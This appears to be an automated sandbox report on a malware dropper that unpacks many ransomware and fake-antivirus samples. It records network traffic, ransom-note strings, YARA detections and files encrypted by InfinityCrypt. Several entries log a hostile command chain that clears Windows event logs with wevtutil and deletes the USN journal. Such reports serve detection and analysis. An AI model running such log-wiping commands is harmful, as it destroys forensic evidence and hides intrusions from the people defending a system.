        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Thu, 29 Sep 2022 12:46:50 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: no-referrer-when-downgradeExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
        Source: unknownTCP traffic detected without corresponding DNS query: 76.73.17.194
        Source: unknownTCP traffic detected without corresponding DNS query: 200.87.164.69
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
        Source: unknownTCP traffic detected without corresponding DNS query: 76.73.17.194
        Source: unknownTCP traffic detected without corresponding DNS query: 200.87.164.69
        Source: unknownTCP traffic detected without corresponding DNS query: 200.87.164.69
        Source: unknownTCP traffic detected without corresponding DNS query: 200.87.164.69
        Source: unknownTCP traffic detected without corresponding DNS query: 76.73.17.194
        Source: unknownTCP traffic detected without corresponding DNS query: 200.87.164.69
        Source: unknownTCP traffic detected without corresponding DNS query: 200.87.164.69
        Source: unknownTCP traffic detected without corresponding DNS query: 200.87.164.69
        Source: unknownTCP traffic detected without corresponding DNS query: 200.87.164.69
        Source: unknownTCP traffic detected without corresponding DNS query: 200.87.164.69
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.0
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.2
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.1
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.3
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.4
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.6
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.5
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.7
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.8
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.9
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.10
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.11
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.12
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.13
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.15
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.18
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.17
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.19
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.20
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.21
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.23
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.24
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.14
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.16
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.22
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.27
        Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.25
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">jnTnjCEP</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">nUFUylEf</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">{RAND}</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">{RAND}</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Indien uw problemen heeft tijdens de installatie of het gebruik van Tor&nbsp;Browser, ga dan naar <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> en typ in de zoekbalk equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Se si riscontrano problemi durante l'installazione o l'utilizzo di Tor&nbsp;Browser, visitare <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e immettere "install tor browser windows" nella barra di ricerca per trovare numerosi video esplicativi sull'installazione e utilizzo di Tor&nbsp;Browser.</p> equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: do portalu <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> i wpisz w wyszukiwarce equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hrend der Installation von Tor&nbsp;Browser Probleme haben, besuchen Sie bitte <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> und geben als Suchanforderung "tor browser Windows installieren" ein und Sie erhalten in den Suchergebnossen viele Anleitungsvideos equals www.youtube.com (Youtube)
        Source: Endermanch@WinlockerVB6Blacksod.exe, 00000035.00000000.408083341.000000000136E000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.google.comhttp://www.yahoo.comhttp://www.example.comtin9999.tmp0.0.0.0.%d equals www.yahoo.com (Yahoo)
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n, o durante el uso del Navegador Tor, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> y escriba la solicitud en la barra de b equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o do Tor&nbsp;Browser, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e insira o pedido na barra de pesquisa equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rken herhangi bir sorununuz olursa <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> adresine gidin ve arama equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: utilisation de Tor&nbsp;Browser, veuillez visiter <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> et saisir la demande dans la barre de recherche equals www.youtube.com (Youtube)
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49708 version: TLS 1.2
        Source: Endermanch@DeriaLock.exe, 0000000B.00000002.598213731.0000000000B7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Source: Yara matchFile source: 11.0.Endermanch@DeriaLock.exe.4c0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000B.00000000.335032516.0000000000506000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Endermanch@DeriaLock.exe PID: 5380, type: MEMORYSTR
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe, type: DROPPED
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5608, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dispci.exe PID: 8456, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: Endermanch@Cerber5.exe PID: 5292, type: MEMORYSTR
        Source: Yara matchFile source: 26.0.Endermanch@InfinityCrypt.exe.710000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.0.Endermanch@InfinityCrypt.exe.7131cc.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000001A.00000002.590516289.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000000.346284169.0000000000723000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000000.346200679.0000000000712000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Endermanch@InfinityCrypt.exe PID: 3772, type: MEMORYSTR
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe, type: DROPPED
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\Fantom.zip entropy: 7.99896513348Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\InfinityCrypt.zip entropy: 7.99452427176Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\Krotten.zip entropy: 7.99208020013Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\BadRabbit.zip entropy: 7.99954529182Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\ViraLock.zip entropy: 7.99846482221Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\Birele.zip entropy: 7.99844368873Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\Cerber 5.zip entropy: 7.99902439733Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\WannaCrypt0r.zip entropy: 7.99994536296Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\DeriaLock.zip entropy: 7.99908454042Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\NoMoreRansom.zip entropy: 7.99977083573Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\Petya.A.zip entropy: 7.99868517199Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\PolyRansom.zip entropy: 7.99851934642Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe entropy: 7.99547094116Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\Xyeta.zip entropy: 7.99739345362Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\Antivirus.zip entropy: 7.99985428104Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\Winlocker.VB6.Blacksod.zip entropy: 7.99988062136Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\Antivirus Platinum.zip entropy: 7.99971875217Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\Antivirus Pro 2017.zip entropy: 7.99977078936Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\AnViPC2009.zip entropy: 7.99983383415Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\FakeAdwCleaner.zip entropy: 7.99895130237Jump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\Happy Antivirus.zip entropy: 7.99990323273Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99949892983Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.9989058342Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99501341776Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99501341776Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99501341776Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99501341776Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99501341776Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\AdobeHunspellPlugin.dll.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99998925995Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\en_CA.dic.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99977046198Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\hyph_en_CA.dic.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99928956866Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\en_GB.aff.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99738785464Jump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A415A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,4_2_04A415A7
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Start Page
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Window title

        System Summary

        barindex
        Source: 1.2.Endermanch@BadRabbit.exe.880000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 4.3.rundll32.exe.3363160.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 4.3.rundll32.exe.3363160.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 44.2.Endermanch@Petya.A.exe.4e0000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Petya Author: ReversingLabs
        Source: 13.0.Fantom.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 44.2.Endermanch@Petya.A.exe.41b363.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Petya Author: ReversingLabs
        Source: 5.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
        Source: 13.0.Fantom.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 21.0.DCD7.tmp.7ff629520000.2.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
        Source: 5.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
        Source: 1.0.Endermanch@BadRabbit.exe.880000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 1.0.Endermanch@BadRabbit.exe.880000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 4.3.rundll32.exe.3363160.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 5.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
        Source: 5.2.Endermanch@Cerber5.exe.1520000.1.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
        Source: 5.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
        Source: 5.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
